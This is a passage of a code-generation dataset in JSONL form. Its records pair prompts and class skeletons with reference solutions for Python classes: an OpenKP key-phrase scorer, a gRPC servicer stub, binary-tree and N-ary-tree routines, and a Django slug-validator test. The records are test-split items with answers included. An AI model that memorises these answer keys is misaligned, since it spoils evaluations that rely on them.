Returns: Three lists (precision@k, recall@k, and F1@k), for k = 1...max_depth.", "name": "get_score_full", "signature": "def get_score_full(self, candidates: List[Text], max_depth: int=5) -> Tuple[List[float], List[float], List[float]]"}], "n_methods": 5, "prompt": "Implement the Python class `OpenKpTextExample` described below.\n\nClass description:\nA text-only representation of an OpenKP example for eval/inference.\n\nMethod signatures and docstrings:\n- def from_json(cls, json_str: Text) -> 'OpenKpTextExample': Constructs a `OpenKpTextExample` from a json string.\n- def to_json_string(self) -> Text: Serializes this instance to a JSON string.\n- def from_openkp_example(cls, example: lib.OpenKpExample) -> 'OpenKpTextExample': Constructs a `OpenKpTextExample` from a `OpenKpExample`.\n- def get_key_phrase_predictions(self, position_predictions: List[KpPositionPrediction], max_predictions: int=5) -> List[Text]: Returns key phrases for the given position predictions. Args: position_predictions: An unsorted list of position predictions. max_predictions: Maximum number of predicted key phrases to return. Returns: A list of the top key phrase predictions in descending order. The key phrases are lowercased and deduplicated. Empty phrases are skipped. Predictions with invalid indices are skipped.\n- def get_score_full(self, candidates: List[Text], max_depth: int=5) -> Tuple[List[float], List[float], List[float]]: Scores the candidate predictions. Follows the official evaluate.py script. Args: candidates: Predicted key phrases (sorted by descending confidence and deduped), will be lower cased. max_depth: Maximum k for precision@k to return. Returns: Three lists (precision@k, recall@k, and F1@k), for k = 1...max_depth.", "prompted_full_text": "Implement the Python class `OpenKpTextExample` described below.\n\nClass description:\nA text-only representation of an OpenKP example for eval/inference.\n\nMethod signatures and docstrings:\n- def from_json(cls, json_str: Text) -> 'OpenKpTextExample': Constructs a `OpenKpTextExample` from a json string.\n- def to_json_string(self) -> Text: Serializes this instance to a JSON string.\n- def from_openkp_example(cls, example: lib.OpenKpExample) -> 'OpenKpTextExample': Constructs a `OpenKpTextExample` from a `OpenKpExample`.\n- def get_key_phrase_predictions(self, position_predictions: List[KpPositionPrediction], max_predictions: int=5) -> List[Text]: Returns key phrases for the given position predictions. Args: position_predictions: An unsorted list of position predictions. max_predictions: Maximum number of predicted key phrases to return. Returns: A list of the top key phrase predictions in descending order. The key phrases are lowercased and deduplicated. Empty phrases are skipped. Predictions with invalid indices are skipped.\n- def get_score_full(self, candidates: List[Text], max_depth: int=5) -> Tuple[List[float], List[float], List[float]]: Scores the candidate predictions. Follows the official evaluate.py script. Args: candidates: Predicted key phrases (sorted by descending confidence and deduped), will be lower cased. max_depth: Maximum k for precision@k to return. 
Returns: Three lists (precision@k, recall@k, and F1@k), for k = 1...max_depth.\n\n<|skeleton|>\nclass OpenKpTextExample:\n \"\"\"A text-only representation of an OpenKP example for eval/inference.\"\"\"\n\n def from_json(cls, json_str: Text) -> 'OpenKpTextExample':\n \"\"\"Constructs a `OpenKpTextExample` from a json string.\"\"\"\n <|body_0|>\n\n def to_json_string(self) -> Text:\n \"\"\"Serializes this instance to a JSON string.\"\"\"\n <|body_1|>\n\n def from_openkp_example(cls, example: lib.OpenKpExample) -> 'OpenKpTextExample':\n \"\"\"Constructs a `OpenKpTextExample` from a `OpenKpExample`.\"\"\"\n <|body_2|>\n\n def get_key_phrase_predictions(self, position_predictions: List[KpPositionPrediction], max_predictions: int=5) -> List[Text]:\n \"\"\"Returns key phrases for the given position predictions. Args: position_predictions: An unsorted list of position predictions. max_predictions: Maximum number of predicted key phrases to return. Returns: A list of the top key phrase predictions in descending order. The key phrases are lowercased and deduplicated. Empty phrases are skipped. Predictions with invalid indices are skipped.\"\"\"\n <|body_3|>\n\n def get_score_full(self, candidates: List[Text], max_depth: int=5) -> Tuple[List[float], List[float], List[float]]:\n \"\"\"Scores the candidate predictions. Follows the official evaluate.py script. Args: candidates: Predicted key phrases (sorted by descending confidence and deduped), will be lower cased. max_depth: Maximum k for precision@k to return. Returns: Three lists (precision@k, recall@k, and F1@k), for k = 1...max_depth.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n json_obj = json.loads(json_str)\n if 'KeyPhrases' in json_obj:\n key_phrases = set((' '.join(lib.KeyPhrase(x).words).lower() for x in json_obj['KeyPhrases']))\n assert len(key_phrases) <= 3\n else:\n key_phrases = None\n return cls(url=json_obj['url'], words=json_obj['text'].split(' '), key_phrases=key_phrases)\n<|end_body_0|>\n\n<|body_start_1|>\n d = {'url': self.url, 'text': ' '.join(self.words)}\n if self.key_phrases is not None:\n d['KeyPhrases'] = [[kp] for kp in sorted(self.key_phrases)]\n return json.dumps(d)\n<|end_body_1|>\n\n<|body_start_2|>\n if example.key_phrases is None:\n key_phrases = None\n else:\n key_phrases = set((' '.join(key_phrase.words).lower() for key_phrase in example.key_phrases))\n assert len(key_phrases) <= 3\n return cls(url=example.url, words=example.text.split(' '), key_phrases=key_phrases)\n<|end_body_2|>\n\n<|body_start_3|>\n sorted_predictions = sorted(position_predictions, key=lambda prediction: prediction.logit, reverse=True)\n key_phrases = []\n for prediction in sorted_predictions:\n if prediction.phrase_len <= 0:\n continue\n key_phrase = ' '.join(self.words[prediction.start_idx:prediction.start_idx + prediction.phrase_len]).lower()\n if not key_phrase:\n continue\n if key_phrase not in key_phrases:\n key_phrases.append(key_phrase)\n if len(key_phrases) >= max_predictions:\n return key_phrases\n return key_phrases\n<|end_body_3|>\n\n<|body_start_4|>\n assert self.key_phrases is not None\n precision = []\n recall = []\n f1 = []\n true_positive = 0.0\n referencelen = float(len(self.key_phrases))\n for i in range(max_depth):\n if len(candidates) > i:\n kp_pred = candidates[i]\n if kp_pred.lower() in self.key_phrases:\n true_positive += 1\n p = true_positive / (i + 1)\n r = true_positive / referencelen\n if p + r > 0:\n f = 2 * p * r / (p + r)\n else:\n f = 0.0\n precision.append(p)\n recall.append(r)\n f1.append(f)\n 
return (precision, recall, f1)\n<|end_body_4|>\n", "revision_id": "5573d9c5822f4e866b6692769963ae819cb3f10d", "skeleton": "<|skeleton|>\nclass OpenKpTextExample:\n \"\"\"A text-only representation of an OpenKP example for eval/inference.\"\"\"\n\n def from_json(cls, json_str: Text) -> 'OpenKpTextExample':\n \"\"\"Constructs a `OpenKpTextExample` from a json string.\"\"\"\n <|body_0|>\n\n def to_json_string(self) -> Text:\n \"\"\"Serializes this instance to a JSON string.\"\"\"\n <|body_1|>\n\n def from_openkp_example(cls, example: lib.OpenKpExample) -> 'OpenKpTextExample':\n \"\"\"Constructs a `OpenKpTextExample` from a `OpenKpExample`.\"\"\"\n <|body_2|>\n\n def get_key_phrase_predictions(self, position_predictions: List[KpPositionPrediction], max_predictions: int=5) -> List[Text]:\n \"\"\"Returns key phrases for the given position predictions. Args: position_predictions: An unsorted list of position predictions. max_predictions: Maximum number of predicted key phrases to return. Returns: A list of the top key phrase predictions in descending order. The key phrases are lowercased and deduplicated. Empty phrases are skipped. Predictions with invalid indices are skipped.\"\"\"\n <|body_3|>\n\n def get_score_full(self, candidates: List[Text], max_depth: int=5) -> Tuple[List[float], List[float], List[float]]:\n \"\"\"Scores the candidate predictions. Follows the official evaluate.py script. Args: candidates: Predicted key phrases (sorted by descending confidence and deduped), will be lower cased. max_depth: Maximum k for precision@k to return. Returns: Three lists (precision@k, recall@k, and F1@k), for k = 1...max_depth.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class OpenKpTextExample:\n \"\"\"A text-only representation of an OpenKP example for eval/inference.\"\"\"\n\n def from_json(cls, json_str: Text) -> 'OpenKpTextExample':\n \"\"\"Constructs a `OpenKpTextExample` from a json string.\"\"\"\n json_obj = json.loads(json_str)\n if 'KeyPhrases' in json_obj:\n key_phrases = set((' '.join(lib.KeyPhrase(x).words).lower() for x in json_obj['KeyPhrases']))\n assert len(key_phrases) <= 3\n else:\n key_phrases = None\n return cls(url=json_obj['url'], words=json_obj['text'].split(' '), key_phrases=key_phrases)\n\n def to_json_string(self) -> Text:\n \"\"\"Serializes this instance to a JSON string.\"\"\"\n d = {'url': self.url, 'text': ' '.join(self.words)}\n if self.key_phrases is not None:\n d['KeyPhrases'] = [[kp] for kp in sorted(self.key_phrases)]\n return json.dumps(d)\n\n def from_openkp_example(cls, example: lib.OpenKpExample) -> 'OpenKpTextExample':\n \"\"\"Constructs a `OpenKpTextExample` from a `OpenKpExample`.\"\"\"\n if example.key_phrases is None:\n key_phrases = None\n else:\n key_phrases = set((' '.join(key_phrase.words).lower() for key_phrase in example.key_phrases))\n assert len(key_phrases) <= 3\n return cls(url=example.url, words=example.text.split(' '), key_phrases=key_phrases)\n\n def get_key_phrase_predictions(self, position_predictions: List[KpPositionPrediction], max_predictions: int=5) -> List[Text]:\n \"\"\"Returns key phrases for the given position predictions. Args: position_predictions: An unsorted list of position predictions. max_predictions: Maximum number of predicted key phrases to return. Returns: A list of the top key phrase predictions in descending order. The key phrases are lowercased and deduplicated. Empty phrases are skipped. 
Predictions with invalid indices are skipped.\"\"\"\n sorted_predictions = sorted(position_predictions, key=lambda prediction: prediction.logit, reverse=True)\n key_phrases = []\n for prediction in sorted_predictions:\n if prediction.phrase_len <= 0:\n continue\n key_phrase = ' '.join(self.words[prediction.start_idx:prediction.start_idx + prediction.phrase_len]).lower()\n if not key_phrase:\n continue\n if key_phrase not in key_phrases:\n key_phrases.append(key_phrase)\n if len(key_phrases) >= max_predictions:\n return key_phrases\n return key_phrases\n\n def get_score_full(self, candidates: List[Text], max_depth: int=5) -> Tuple[List[float], List[float], List[float]]:\n \"\"\"Scores the candidate predictions. Follows the official evaluate.py script. Args: candidates: Predicted key phrases (sorted by descending confidence and deduped), will be lower cased. max_depth: Maximum k for precision@k to return. Returns: Three lists (precision@k, recall@k, and F1@k), for k = 1...max_depth.\"\"\"\n assert self.key_phrases is not None\n precision = []\n recall = []\n f1 = []\n true_positive = 0.0\n referencelen = float(len(self.key_phrases))\n for i in range(max_depth):\n if len(candidates) > i:\n kp_pred = candidates[i]\n if kp_pred.lower() in self.key_phrases:\n true_positive += 1\n p = true_positive / (i + 1)\n r = true_positive / referencelen\n if p + r > 0:\n f = 2 * p * r / (p + r)\n else:\n f = 0.0\n precision.append(p)\n recall.append(r)\n f1.append(f)\n return (precision, recall, f1)\n", "source": "the_stack_v2_python_sparse", "source_path": "etcmodel/models/openkp/eval_utils.py", "source_repo": "Jimmy-INL/google-research", "split": "test", "star_events_count": 1} {"blob_id": "b7dc81606048cf0d1afa32129aa5a1b5b32f79f8", "bodies": ["context.set_code(grpc.StatusCode.UNIMPLEMENTED)\ncontext.set_details('Method not implemented!')\nraise NotImplementedError('Method not implemented!')", "context.set_code(grpc.StatusCode.UNIMPLEMENTED)\ncontext.set_details('Method not implemented!')\nraise NotImplementedError('Method not implemented!')"], "bodies_text": "<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_1|>\n", "class_docstring": "Missing associated documentation comment in .proto file.", "class_name": "DatasetFeedServicer", "detected_licenses": ["Apache-2.0", "BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DatasetFeedServicer:\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n\n def get_examples(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_0|>\n\n def shutdown(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000439", "length_bytes": 3867, 
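As a sanity check on the metric definitions in get_score_full, the same precision@k / recall@k / F1@k loop can be run standalone; the gold phrases and candidates below are invented:

    def score_at_k(key_phrases, candidates, max_depth=5):
        # key_phrases: set of lowercased gold phrases; candidates: ranked predictions.
        precision, recall, f1 = ([], [], [])
        true_positive = 0.0
        for i in range(max_depth):
            if len(candidates) > i and candidates[i].lower() in key_phrases:
                true_positive += 1
            p = true_positive / (i + 1)
            r = true_positive / len(key_phrases)
            f = 2 * p * r / (p + r) if p + r > 0 else 0.0
            precision.append(p)
            recall.append(r)
            f1.append(f)
        return (precision, recall, f1)

    p, r, f = score_at_k({'open kp', 'key phrase'}, ['key phrase', 'noise', 'open kp'], max_depth=3)
    assert r == [0.5, 0.5, 1.0] and abs(f[2] - 0.8) < 1e-09

With two gold phrases and hits at ranks 1 and 3, precision@3 is 2/3, recall@3 is 1.0, and F1@3 is 0.8, matching the record's formula.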
"license_type": "permissive", "methods": [{"docstring": "Missing associated documentation comment in .proto file.", "name": "get_examples", "signature": "def get_examples(self, request, context)"}, {"docstring": "Missing associated documentation comment in .proto file.", "name": "shutdown", "signature": "def shutdown(self, request, context)"}], "n_methods": 2, "prompt": "Implement the Python class `DatasetFeedServicer` described below.\n\nClass description:\nMissing associated documentation comment in .proto file.\n\nMethod signatures and docstrings:\n- def get_examples(self, request, context): Missing associated documentation comment in .proto file.\n- def shutdown(self, request, context): Missing associated documentation comment in .proto file.", "prompted_full_text": "Implement the Python class `DatasetFeedServicer` described below.\n\nClass description:\nMissing associated documentation comment in .proto file.\n\nMethod signatures and docstrings:\n- def get_examples(self, request, context): Missing associated documentation comment in .proto file.\n- def shutdown(self, request, context): Missing associated documentation comment in .proto file.\n\n<|skeleton|>\nclass DatasetFeedServicer:\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n\n def get_examples(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_0|>\n\n def shutdown(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_1|>\n", "revision_id": "43dae4b28531cde167598f104f582168b0a4141f", "skeleton": "<|skeleton|>\nclass DatasetFeedServicer:\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n\n def get_examples(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_0|>\n\n def shutdown(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DatasetFeedServicer:\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n\n def get_examples(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def shutdown(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n", "source": "the_stack_v2_python_sparse", "source_path": "training/heterogeneous-clusters/pt.grpc.sagemaker/code/dataset_feed_pb2_grpc.py", "source_repo": "aws/amazon-sagemaker-examples", "split": "test", "star_events_count": 4797} {"blob_id": "2d697450b617fd6843744cacf27a082f64bdceed", "bodies": ["def buildChildTree(preIndex, inIndex, length):\n if length == 0:\n return None\n root = 
TreeNode(preorder[preIndex])\n count = 0\n while inorder[inIndex + count] != preorder[preIndex]:\n count += 1\n root.left = buildChildTree(preIndex + 1, inIndex, count)\n root.right = buildChildTree(preIndex + count + 1, inIndex + count + 1, length - count - 1)\n return root\nreturn buildChildTree(0, 0, len(preorder))", "if not preorder:\n return None\nroot = TreeNode(preorder[0])\nindex = inorder.index(preorder[0])\nroot.left = self.buildTree(preorder[1:index + 1], inorder[:index])\nroot.right = self.buildTree(preorder[index + 1:], inorder[index + 1:])\nreturn root"], "bodies_text": "<|body_start_0|>\n def buildChildTree(preIndex, inIndex, length):\n if length == 0:\n return None\n root = TreeNode(preorder[preIndex])\n count = 0\n while inorder[inIndex + count] != preorder[preIndex]:\n count += 1\n root.left = buildChildTree(preIndex + 1, inIndex, count)\n root.right = buildChildTree(preIndex + count + 1, inIndex + count + 1, length - count - 1)\n return root\n return buildChildTree(0, 0, len(preorder))\n<|end_body_0|>\n\n<|body_start_1|>\n if not preorder:\n return None\n root = TreeNode(preorder[0])\n index = inorder.index(preorder[0])\n root.left = self.buildTree(preorder[1:index + 1], inorder[:index])\n root.right = self.buildTree(preorder[index + 1:], inorder[index + 1:])\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def buildTree(self, preorder, inorder):\n \"\"\":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\"\"\"\n <|body_0|>\n\n def buildTree2(self, preorder, inorder):\n \"\"\":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def buildChildTree(preIndex, inIndex, length):\n if length == 0:\n return None\n root = TreeNode(preorder[preIndex])\n count = 0\n while inorder[inIndex + count] != preorder[preIndex]:\n count += 1\n root.left = buildChildTree(preIndex + 1, inIndex, count)\n root.right = buildChildTree(preIndex + count + 1, inIndex + count + 1, length - count - 1)\n return root\n return buildChildTree(0, 0, len(preorder))\n<|end_body_0|>\n\n<|body_start_1|>\n if not preorder:\n return None\n root = TreeNode(preorder[0])\n index = inorder.index(preorder[0])\n root.left = self.buildTree(preorder[1:index + 1], inorder[:index])\n root.right = self.buildTree(preorder[index + 1:], inorder[index + 1:])\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000440", "length_bytes": 1314, "license_type": "permissive", "methods": [{"docstring": ":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode", "name": "buildTree", "signature": "def buildTree(self, preorder, inorder)"}, {"docstring": ":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode", "name": "buildTree2", "signature": "def buildTree2(self, preorder, inorder)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def buildTree(self, preorder, inorder): :type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\n- def buildTree2(self, preorder, inorder): :type preorder: List[int] :type inorder: List[int] :rtype: TreeNode", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and 
docstrings:\n- def buildTree(self, preorder, inorder): :type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\n- def buildTree2(self, preorder, inorder): :type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\n\n<|skeleton|>\nclass Solution:\n\n def buildTree(self, preorder, inorder):\n \"\"\":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\"\"\"\n <|body_0|>\n\n def buildTree2(self, preorder, inorder):\n \"\"\":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def buildChildTree(preIndex, inIndex, length):\n if length == 0:\n return None\n root = TreeNode(preorder[preIndex])\n count = 0\n while inorder[inIndex + count] != preorder[preIndex]:\n count += 1\n root.left = buildChildTree(preIndex + 1, inIndex, count)\n root.right = buildChildTree(preIndex + count + 1, inIndex + count + 1, length - count - 1)\n return root\n return buildChildTree(0, 0, len(preorder))\n<|end_body_0|>\n\n<|body_start_1|>\n if not preorder:\n return None\n root = TreeNode(preorder[0])\n index = inorder.index(preorder[0])\n root.left = self.buildTree(preorder[1:index + 1], inorder[:index])\n root.right = self.buildTree(preorder[index + 1:], inorder[index + 1:])\n return root\n<|end_body_1|>\n", "revision_id": "c8bf33af30569177c5276ffcd72a8d93ba4c402a", "skeleton": "<|skeleton|>\nclass Solution:\n\n def buildTree(self, preorder, inorder):\n \"\"\":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\"\"\"\n <|body_0|>\n\n def buildTree2(self, preorder, inorder):\n \"\"\":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def buildTree(self, preorder, inorder):\n \"\"\":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\"\"\"\n def buildChildTree(preIndex, inIndex, length):\n if length == 0:\n return None\n root = TreeNode(preorder[preIndex])\n count = 0\n while inorder[inIndex + count] != preorder[preIndex]:\n count += 1\n root.left = buildChildTree(preIndex + 1, inIndex, count)\n root.right = buildChildTree(preIndex + count + 1, inIndex + count + 1, length - count - 1)\n return root\n return buildChildTree(0, 0, len(preorder))\n\n def buildTree2(self, preorder, inorder):\n \"\"\":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\"\"\"\n if not preorder:\n return None\n root = TreeNode(preorder[0])\n index = inorder.index(preorder[0])\n root.left = self.buildTree(preorder[1:index + 1], inorder[:index])\n root.right = self.buildTree(preorder[index + 1:], inorder[index + 1:])\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "101-200/101-110/105-binaryTreeFromPreInOrder/binaryTreeFromPreInOrder.py", "source_repo": "xuychen/Leetcode", "split": "test", "star_events_count": 0} {"blob_id": "2d858c32871d5b958dc12f0ec79e92063d6e2c30", "bodies": ["if root == None:\n return 0\nmax_sub_depth = 0\nfor node in root.children:\n cur_depth = self.maxDepthWithRecursion(node)\n max_sub_depth = max(cur_depth, max_sub_depth)\nreturn max_sub_depth + 1", "if root == None:\n return 0\nmax_depth = 0\nqueue = []\nqueue.append([root, 1])\nwhile len(queue) > 0:\n node, depth = queue.pop(0)\n max_depth = max(max_depth, depth)\n for sub_node in node.children:\n queue.append([sub_node, depth + 1])\nreturn max_depth"], "bodies_text": "<|body_start_0|>\n if root == 
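A quick usage check for the preorder/inorder reconstruction above, using the record's Solution class; the TreeNode definition is the usual LeetCode one and is not part of the record:

    class TreeNode:
        def __init__(self, val=0, left=None, right=None):
            self.val, self.left, self.right = (val, left, right)

    # preorder [3, 9, 20, 15, 7] with inorder [9, 3, 15, 20, 7] encodes:
    #       3
    #      / \
    #     9  20
    #        / \
    #       15  7
    root = Solution().buildTree([3, 9, 20, 15, 7], [9, 3, 15, 20, 7])
    assert (root.val, root.left.val, root.right.val) == (3, 9, 20)
    assert (root.right.left.val, root.right.right.val) == (15, 7)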
None:\n return 0\n max_sub_depth = 0\n for node in root.children:\n cur_depth = self.maxDepthWithRecursion(node)\n max_sub_depth = max(cur_depth, max_sub_depth)\n return max_sub_depth + 1\n<|end_body_0|>\n\n<|body_start_1|>\n if root == None:\n return 0\n max_depth = 0\n queue = []\n queue.append([root, 1])\n while len(queue) > 0:\n node, depth = queue.pop(0)\n max_depth = max(max_depth, depth)\n for sub_node in node.children:\n queue.append([sub_node, depth + 1])\n return max_depth\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def maxDepthWithRecursion(self, root):\n \"\"\":type root: Node :rtype: int\"\"\"\n <|body_0|>\n\n def maxDepthWithQueue(self, root):\n \"\"\":type root: Node :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if root == None:\n return 0\n max_sub_depth = 0\n for node in root.children:\n cur_depth = self.maxDepthWithRecursion(node)\n max_sub_depth = max(cur_depth, max_sub_depth)\n return max_sub_depth + 1\n<|end_body_0|>\n\n<|body_start_1|>\n if root == None:\n return 0\n max_depth = 0\n queue = []\n queue.append([root, 1])\n while len(queue) > 0:\n node, depth = queue.pop(0)\n max_depth = max(max_depth, depth)\n for sub_node in node.children:\n queue.append([sub_node, depth + 1])\n return max_depth\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000441", "length_bytes": 1003, "license_type": "no_license", "methods": [{"docstring": ":type root: Node :rtype: int", "name": "maxDepthWithRecursion", "signature": "def maxDepthWithRecursion(self, root)"}, {"docstring": ":type root: Node :rtype: int", "name": "maxDepthWithQueue", "signature": "def maxDepthWithQueue(self, root)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001257", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxDepthWithRecursion(self, root): :type root: Node :rtype: int\n- def maxDepthWithQueue(self, root): :type root: Node :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxDepthWithRecursion(self, root): :type root: Node :rtype: int\n- def maxDepthWithQueue(self, root): :type root: Node :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def maxDepthWithRecursion(self, root):\n \"\"\":type root: Node :rtype: int\"\"\"\n <|body_0|>\n\n def maxDepthWithQueue(self, root):\n \"\"\":type root: Node :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if root == None:\n return 0\n max_sub_depth = 0\n for node in root.children:\n cur_depth = self.maxDepthWithRecursion(node)\n max_sub_depth = max(cur_depth, max_sub_depth)\n return max_sub_depth + 1\n<|end_body_0|>\n\n<|body_start_1|>\n if root == None:\n return 0\n max_depth = 0\n queue = []\n queue.append([root, 1])\n while len(queue) > 0:\n node, depth = queue.pop(0)\n max_depth = max(max_depth, depth)\n for sub_node in node.children:\n queue.append([sub_node, depth + 1])\n return max_depth\n<|end_body_1|>\n", "revision_id": "176cc1db3291843fb068f06d0180766dd8c3122c", "skeleton": "<|skeleton|>\nclass Solution:\n\n def maxDepthWithRecursion(self, root):\n \"\"\":type root: Node :rtype: int\"\"\"\n <|body_0|>\n\n def maxDepthWithQueue(self, root):\n \"\"\":type root: Node :rtype: 
int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def maxDepthWithRecursion(self, root):\n \"\"\":type root: Node :rtype: int\"\"\"\n if root == None:\n return 0\n max_sub_depth = 0\n for node in root.children:\n cur_depth = self.maxDepthWithRecursion(node)\n max_sub_depth = max(cur_depth, max_sub_depth)\n return max_sub_depth + 1\n\n def maxDepthWithQueue(self, root):\n \"\"\":type root: Node :rtype: int\"\"\"\n if root == None:\n return 0\n max_depth = 0\n queue = []\n queue.append([root, 1])\n while len(queue) > 0:\n node, depth = queue.pop(0)\n max_depth = max(max_depth, depth)\n for sub_node in node.children:\n queue.append([sub_node, depth + 1])\n return max_depth\n", "source": "the_stack_v2_python_sparse", "source_path": "2020/tree/maximum_depth_of_n_ary_tree_559.py", "source_repo": "yehongyu/acode", "split": "test", "star_events_count": 0} {"blob_id": "e6164e470ea8b3e7fb60a21db9dd465ee5738e07", "bodies": ["with self.assertRaises(ValidationError):\n miner = Miner(name='Some Miner', version='1.0.0', slug='create')\n miner.full_clean()\n miner.save()", "miner = Miner(name='Some Miner', version='1.0.0', slug='some-miner-slug')\nminer.full_clean()\nminer.save()"], "bodies_text": "<|body_start_0|>\n with self.assertRaises(ValidationError):\n miner = Miner(name='Some Miner', version='1.0.0', slug='create')\n miner.full_clean()\n miner.save()\n<|end_body_0|>\n\n<|body_start_1|>\n miner = Miner(name='Some Miner', version='1.0.0', slug='some-miner-slug')\n miner.full_clean()\n miner.save()\n<|end_body_1|>\n", "class_docstring": "Тестирование валидатора slug", "class_name": "SlugValidatorTest", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SlugValidatorTest:\n \"\"\"Тестирование валидатора slug\"\"\"\n\n def test_validate_invalid_slug(self):\n \"\"\"Тестирование invalid slug\"\"\"\n <|body_0|>\n\n def test_validate_valid_slug(self):\n \"\"\"Тестирование valid slug\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n with self.assertRaises(ValidationError):\n miner = Miner(name='Some Miner', version='1.0.0', slug='create')\n miner.full_clean()\n miner.save()\n<|end_body_0|>\n\n<|body_start_1|>\n miner = Miner(name='Some Miner', version='1.0.0', slug='some-miner-slug')\n miner.full_clean()\n miner.save()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000442", "length_bytes": 13105, "license_type": "permissive", "methods": [{"docstring": "Тестирование invalid slug", "name": "test_validate_invalid_slug", "signature": "def test_validate_invalid_slug(self)"}, {"docstring": "Тестирование valid slug", "name": "test_validate_valid_slug", "signature": "def test_validate_valid_slug(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004703", "prompt": "Implement the Python class `SlugValidatorTest` described below.\n\nClass description:\nТестирование валидатора slug\n\nMethod signatures and docstrings:\n- def test_validate_invalid_slug(self): Тестирование invalid slug\n- def test_validate_valid_slug(self): Тестирование valid slug", "prompted_full_text": "Implement the Python class `SlugValidatorTest` described below.\n\nClass description:\nТестирование валидатора slug\n\nMethod signatures and docstrings:\n- def 